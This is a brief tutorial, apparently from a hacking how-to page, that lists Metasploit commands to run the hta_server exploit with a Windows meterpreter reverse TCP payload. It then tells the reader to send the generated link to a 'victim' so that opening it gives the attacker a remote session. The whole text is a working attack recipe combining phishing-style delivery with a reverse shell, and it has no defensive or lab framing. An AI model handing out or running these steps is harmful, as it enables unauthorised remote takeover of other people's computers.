Requirements :


Kali Linux

Internet






COMMANDS




open new terminal in kali linux
 
msfconsole

use exploit/windows/misc/hta_server

set lhost 172.46.22.155 (replace your ip here)

set srvhost 172.46.22.155 (replace your ip here)

set payload windows/meterpreter/reverse_tcp

set lport 8111

exploit

U will get a link there , send it to victim and let him open it .

After he opens the link will automatically install a html document .

If vicims opens it , you will get a meterpreter session .